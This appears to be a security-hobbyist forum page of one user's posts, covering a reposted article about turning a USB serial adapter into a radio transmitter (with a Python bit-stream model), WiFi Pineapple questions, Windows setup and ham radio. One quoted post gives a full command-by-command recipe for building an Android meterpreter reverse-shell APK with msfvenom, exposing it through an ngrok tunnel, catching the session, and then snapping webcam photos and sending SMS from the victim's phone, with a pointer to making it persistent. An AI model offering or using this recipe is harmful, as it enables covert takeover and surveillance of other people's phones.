
Forkish

Active Members
  • Posts: 421
  • Joined
  • Days Won: 18

Posts posted by Forkish

  1. YOUR USB SERIAL ADAPTER JUST BECAME A SDR


    To say that the RTL-SDR project was revolutionary might be something of an understatement. Taking a cheap little USB gadget and using it as a Software Defined Radio (SDR) to explore the radio spectrum from the tens of megahertz all the way into gigahertz frequencies with the addition of nothing more than some open source tools may go down as one of the greatest hacks of the decade. But even in the era of RTL-SDR, what [Ted Yapo] has managed to pull off is still pretty incredible.

    With a Python script, a length of wire attached to the TX pin, and a mastery of the electron that we mere mortals can only hope to achieve, [Ted] has demonstrated using a common USB to serial adapter as an SDR transmitter. That’s right, using the cheap little UART adapter you’ve almost certainly got sitting in your parts bin right now and his software, you can transmit in the low megahertz frequencies and even up into VHF with some trickery. The project is still very much experimental, and though this may be the first time, we’re willing to bet this isn’t the last time you’ll be hearing about it.

    The basic idea is that when sending certain characters over the UART serial line, they can combine with the start and stop bits to produce a square wave burst at half the baud rate. [Ted] found that sending a string of 0x55 at 19200 baud would generate a continuous square wave at 9600 Hz, and if he turned the baud rate all the way up to 2,000,000 where these USB adapters top out, that signal was transmitted at 1 MHz, right in the middle of the AM dial.

    A neat trick to be sure, but alone not terribly useful. The next step was to modulate that signal by sending different characters over UART. [Ted] explains at great length his experiments with multi-level quantization and delta-sigma schemes, and each step of the way shows the improvement of the transmitted audio signal. Ultimately he comes up with a modulation scheme that produces an impressively clean signal, all things considered.

    This alone is impressive, but [Ted] isn’t done yet. He realized that this method of transmission was generating some strong frequency harmonics which extended far beyond the theoretical maximum 1 MHz frequency of his UART SDR. In his experimentation he found he was able to pick up a signal from all the way out to 151 MHz, though it was too poor to be of any practical use. Dialing back the expectations a bit, he was able to successfully control a cheap 27 MHz RC toy using the 43rd harmonic of a 631 kHz signal at a range of about 10 feet with an FT232RL adapter, which he notes produces the cleanest signals in his testing.

    [Ted] is still working on making transmissions cleaner and stronger by adding filters and amplifiers, but these early accomplishments are already very promising. His work reminds us of a low frequency version of the USB to VGA adapter turned GHz SDR transmitter, and we’re very eager to see where it goes from here.

     

    • Like 1
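    The post above says that a stream of 0x55 bytes at 19200 baud produces a 9600 Hz square wave and that a 27 MHz toy was driven by the 43rd harmonic of a 631 kHz signal. The following is an added example, not code from the Hackaday write-up or from [Ted Yapo]'s project: it models the UART line levels under the assumption of standard 8N1 framing (idle high, one 0 start bit, eight data bits sent least-significant bit first, one 1 stop bit) and shows why 0x55, and not for instance 0xAA, yields a clean square wave at half the baud rate. It is useful on the defensive side too, for reasoning about unintended RF emissions from serial lines.

```python
"""UART bit-stream model for the '0x55 square wave' effect.

Added illustration (not code from the article or the project).
Assumption: 8N1 framing, idle line high, start bit 0, eight data bits
LSB first, stop bit 1, frames sent back to back with no idle gap.
"""
from typing import List


def uart_frame(byte: int) -> List[int]:
    """Return the 10 line levels for one 8N1 frame carrying `byte`."""
    if not 0 <= byte <= 0xFF:
        raise ValueError("byte must fit in 8 bits")
    data_bits = [(byte >> i) & 1 for i in range(8)]  # LSB goes out first
    return [0] + data_bits + [1]  # start bit, data bits, stop bit


def line_levels(payload: bytes) -> List[int]:
    """Concatenate the frames for a whole byte string."""
    levels: List[int] = []
    for b in payload:
        levels.extend(uart_frame(b))
    return levels


def is_square_wave(levels: List[int]) -> bool:
    """True when every bit toggles relative to the previous one, i.e. the
    line is a 50% duty square wave with a period of two bit times."""
    return all(a != b for a, b in zip(levels, levels[1:]))


def fundamental_hz(levels: List[int], baud: int) -> float:
    """Fundamental frequency of a clean alternating stream: one cycle spans
    two bit times, so f = baud / 2."""
    if not is_square_wave(levels):
        raise ValueError("stream is not a clean square wave")
    return baud / 2


def nth_harmonic_hz(fundamental: float, n: int) -> float:
    """Frequency of the n-th harmonic (a 50% duty square wave ideally has
    only odd harmonics, and 43 is odd)."""
    return n * fundamental


if __name__ == "__main__":
    stream = line_levels(b"\x55" * 4)
    print(stream)                                # 0,1,0,1,... for 40 bits
    print(fundamental_hz(stream, 19_200))        # 9600.0
    print(fundamental_hz(stream, 2_000_000))     # 1000000.0
    print(nth_harmonic_hz(631_000, 43))          # 27133000
    print(is_square_wave(line_levels(b"\xaa")))  # False
```

    0xAA fails because its least-significant bit is 0, so the start bit and first data bit sit at the same level and the alternation breaks; 0x55 works because the start bit (0), the alternating data bits beginning with 1, and the stop bit (1) followed by the next start bit (0) all continue the same toggle pattern.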
  2. Would a module that gives you a little hovering bubble (think terrible 'chat with us now!' ads) showing selected information be possible with the UI’s abilities?

    Would it be difficult to show information/status about the pineapple? Examples could be your network status and SSIDs showing. Or your current public IP and number of clients and their MAC.  Is it possible?

  3. 2 hours ago, Just_a_User said:

    Oh man I have about 33% of my seen MAC's blue at my home location. Including some AP's that also have similar ISP names but with black MAC's I guess ISP's are at it as well... or I have neighbours that know more than they let on 😄

    So if the pineapple is stationary, would this indicate either APs turned off, mobile APs, or the very edge of reception range that comes and goes, maybe with interference, moving obstructions, etc.? Any others?

    Could it also be the APs setting to send out beacons at a very low rate?

  4. Two questions for the knowledged:

    After a recon scan, in the results, why are some of the SSID & BSSID rows blue while others are black?

    And the Out of Range Clients: are they connected clients and APs that I can reach with my equipment, but they can’t reach me with theirs?

     

  5. On 11/6/2018 at 9:46 AM, Zajt said:

    I am thinking of making some module with something for a large project in school, and wonder about what is missing today with the modules available. Anything have some thoughts that would be cool to make? Maybe some detection of some attack or something similar?

    A module that lets you back up your pineapple and/or upload saved backups.

    As well, a module that allows you to issue custom commands would be nice. It’d make issuing CLI commands when mobile easier. Someone started working on one but it never came to fruition. Look back a page or two here and you’ll see it.

    • Like 1
  6. On 10/14/2018 at 5:03 AM, acid klown said:

    Hi Benny!

     

    ^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!

     

    I am interested in the same topic, and spent a lot of time this week making it all real.

     

    Here is a summary of what I did to pwn my Android phone via my other Android phone:

    1) Download Termux on Google play store.

    2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh

    3) git clone https://github.com/rapid7/metasploit-framework

    4) CD metasploit-framework

    5) bundle install (takes about 5 minutes)

    6) Go to 

    https://dashboard.ngrok.com/user/signup

    And register a port forwarding free.

    7) git clone https://github.com/inconshreveable/ngrok

     

    8) CD ngrok

    9) ./ngrok tokenauth (your ngrok token) one time dealio

    10) ping o.tcp.ngrok.io (get the ngrok IP address)

     

    11) ./ngrok tcp 4564

    12) Open new windows session

    Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework.

    13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk

     

    This creates the payload in the root directory on the Android phone.

     

    14) ./msfconsole

    15) msf> use exploit /multi/handler

    msf> set payload android/meterpreter/reverse_tcp

    msf> set LHOST localhost

    msf> set lport 4564

    msf> exploit -j -z

     

    16) run lolz.apk payload on other phone.

    Ngrok waiting for session. Mad waiting for session.

    Voila! Once it connects,

    Type sessions -i 1 and see meterpreter.

    Type help for commands.

    Type command -h for help with a command.

    webcam_snap -i 2 -p /sdcard/selfy.jpg

    send_sms -d 2149711234 -t "what's up Darren :)"

    commands here

    https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699

     

    You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article:

    https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

     

    Manz, you’re good to pwn.

     

    I also recommend, 

    Git clone https:///github.com/RajkumrdusadTool-X

    200 kali tools for termux!!

    I love this pr09.

    Please note: Ngrok port randomly changes, so your payload must co-align.

    I haven't used evil Droid so maybe you know. ?

     

    - คςเ๔ кɭ๏ฬภ

     

     

    A+

  7. Dismantle everything with circuitry; wrap in foil; put in giant box wrapped in foil, as far away from you as possible; keep an eye under your car; buy new phones with cash, no name attached; never use a USB stick on two different systems or after 7 days; SD cards with physical locking levers are your friend; so are friends with CD burners; Walmart and Office Depot computers/laptops with cash; before setup, remove BLE/WIFI chips; start them up away from home (library, mall, Panera Bread); return within two weeks for refund; make sure to change out vehicle headunit; anything with USB ports; move if possible; cancel internet if possible; all those parts in foil, liquidate it all; start a new hobby like photography; wait 2-6 months; rebuild your life with a smarter perspective.

    ..This too shall pass..

  8. 7 hours ago, barry99705 said:

    There are several apps that can use kismet data for heatmaps.  Though it's much easier to just use an android device and one of the wireless heat mapping apps for it.

    Do you have a favorite Android app for this? I’m an iPhone user, but I recently picked up a Nexus 5 for minor but convenient options such as this.

  9. 8 hours ago, Exmix said:

    It's been so long since i've had to enable/disable windows features I forget what I had done, so I can't help in that aspect, sorry.

    As far as Malwarebytes, I will back that up and say it is a good addition to have with Windows Defender. Also another good small piece of software from Malwarebytes is their AdwCleaner.

    As far as making Linux distro startup USBs, the software I use and like is called Yumi. I like it because it lets me use one USB for multiple distros. I use mine for Kali, Ubuntu, Tails, Gparted, Clonezilla, etc. There is another I used in the past, which I’ve heard is still good for various reasons, called Rufus.

    Awesome, I’ll check out Yumi. I’ll probably grab rufus as well just to complicate things.

  10. Last time I had a Windows machine, I was rocking Windows 8.1. Of course I’ve used them intermittently and turned off as much telemetry as they’ll allow; it only connects to a subnetted travel router which is VPNed and does DNS adblocking; fully updated and segregating a few unprivileged users according to use. I ran across Tronscript, which seems to be a series of batch files to automate tedious bloatware removal and the like. It seems promising. I also enabled the Linux subsystem, which leads me to a bigger question.

    Any heavy suggestions towards enabling or disabling of some system features? Also do I need to enable Hypervisor to use virtual machines? 

    I’ve heard malwarebytes is a good addition to windows defender.

    In the next day or two I’d like to create a few linux distro startup USB sticks, which program is often preferred for that?

    I’ll add anything else I can think of when it comes.

  11. I’ve got an extra WRT1900 that I want to use as a main AP. The layout of the house is dookie for wifi. Ultimately the preferred placement for us is outside, centrally placed under a well covered breezeway. I live in a very Florida-esque environment and I’ve seen corrosion slowly seep into outdoor electronics. I want to mitigate this if possible.

    I’ve seen posts/videos of people using sprays like Corrosion-X and Corrosion Block on the electronics of their drones. I love Corrosion-X, but I’ve yet to open an old router and douse the innards to see what happens.

    Does anyone have any knowledge or experience with treating electronics for outdoor use they’d be willing to share?

  12. I don’t want to thread jack, but I’m throwing this stuff in here because it seems to be a bustling thread with knowledgeable people..

    In the back of my mind, I’ve always wanted to get into short band radio stuff. Shit hits the fan kind of mentality. One of the networking apps I use is by a guy named Marcus Roskosch and he makes a bunch of really in depth Ham radio and electronic diagnostic/information type apps. Where’s a good place to start?

    Not spam, but check out some of his stuff. Maybe someone might find it useful:

    http://roskosch.de/marcus-roskosch/

    HAM Radio Technician Exam preparation by Marcus Roskosch

    HAM Radio Extra Exam preparation - FCC - ARRL by Marcus Roskosch

    HAM Radio General Exam preparation - FCC - ARRL by Marcus Roskosch

    RF-Toolbox Pro by Marcus Roskosch

    Electronic Toolbox Pro by Marcus Roskosch

    Home - Electronic Toolbox

     

  13. awesome

    9 hours ago, Dave-ee Jones said:

    When people say "5 GHz" they mean everything in the range of 5.1 -> 5.8 (specifically, for the US it's 5170-5835) for WLAN. That's why it's unspecified and rounded to 5 GHz.
    Most drones (and some RC cars) use 5.8 GHz, or 2.4 GHz. I assume it's for the range.

    We specify 2.4 GHz because it's only the 2400 MHz range that we use for WLAN.

    Not sure what they are exactly for Australia.

    that makes sense. thanks for the clarification.

  14. I’ve always known wifi to be 2.4 & 5 GHz. Is it really 5.8 GHz used with drones, or is wifi 5 GHz and drones are 5.8 GHz?

    if the same, wouldn’t a yagi and deauth be very similar to jamming?

    This much jam talk makes me want to watch Always Sunny in Philadelphia.

    Cat in the wall ‘eh?!

  15. On 4/7/2018 at 2:08 PM, i8igmac said:

    Yes meterpreter is installed on my phone.

    Which phone do you think is most excellent for this extremely gnarly know-how?

    Bill and Ted was on tonight. I can’t get this voice out of my head.
